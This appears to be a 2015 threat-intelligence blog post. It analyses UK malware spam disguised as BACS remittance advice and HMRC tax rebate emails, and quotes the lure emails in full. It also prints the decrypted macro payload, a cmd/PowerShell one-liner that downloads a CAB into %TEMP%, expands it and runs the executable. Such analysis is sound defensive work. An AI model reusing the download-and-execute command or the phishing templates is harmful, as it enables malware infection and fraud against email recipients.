Wednesday, 11 March 2015

Malware spam: BACS "Remittance Advice" / HMRC "Your Tax rebate"

These two malware spam runs are aimed at UK victims, pretending to be either a tax rebate or a BACS payment.

From:    Long Fletcher
Date:    11 March 2015 at 09:44
Subject:    Remittance Advice

Good Morning,

Please find attached the BACS Remittance Advice for payment made by RENEW HLDGS.

Please note this may show on your account as a payment reference of FPALSDB.

Kind Regards
Long Fletcher
Finance Coordinator

Attachment: LSDB.xls


From:    Vaughn Baker
Date:    11 March 2015 at 09:27
Subject:    Your Remittance Advice [FPABHKZCNZ]

Good Morning,

Please find attached the BACS Remittance Advice for payment made by JD SPORTS FASHION PLC.

Please note this may show on your account as a payment reference of FPABHKZCNZ.

Kind Regards
Vaughn Baker
Senior Accountant


From:    HMRC
Date:    11 March 2015 at 10:04
Subject:    Your Tax rebate

Dear [redacted],

After the last yearly computations of your financial functioning we have defined that you have the right to obtain a tax rebate of 934.80. Please confirm the tax rebate claim and permit us have 6-9 days so that we execute it. A rebate can be postponed for a variety of reasons. For instance confirming unfounded data or applying not in time.

To access the form for your tax rebate, view the report attached. Document Reference: (196XQBK).

Regards, HM Revenue Service. We apologize for the inconvenience.

The security and confidentiality of your personal information is important for us. If you have any questions, please either call the toll-free customer service phone number.
© 2014, all rights reserved

Sample attachment names:

HMRC: 196XQBK.xls, 89WDZ.xls
BACS: LSDB.xls, Rem_8392TN.xml (note that this is actually an Excel document, not an XML file)

All of these documents have low detection rates [1] [2] [3] [4] and contain these very similar malicious macros (containing sandbox detection algorithms) [1] [2] [3] [4] which when decrypted attempt to run the following Powershell commands:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('','%TEMP%\'); expand %TEMP%\ %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('','%TEMP%\'); expand %TEMP%\ %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('','%TEMP%\'); expand %TEMP%\ %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('','%TEMP%\'); expand %TEMP%\ %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
These are probably compromised hosts, for the record they are: (Servachok Ltd, Russia) (PE Gornostay Mikhailo Ivanovich, Ukraine) (Pirix, Russia) (EuroByte / Webazilla, Russia)

These download a CAB file, and then expand and execute it. This EXE has a detection rate of 4/57 and automated analysis tools [1] [2] show attempted traffic to: (Digital Networks aka DINETHOSTING, Russia) (TheFirst.RU, Russia) (OVH, France)

According to this Malwr report it drops two further malicious files with the following MD5s:

8d3a1903358c5f3700ffde113b93dea6 [VT 2/56]

Recommended blocklist:

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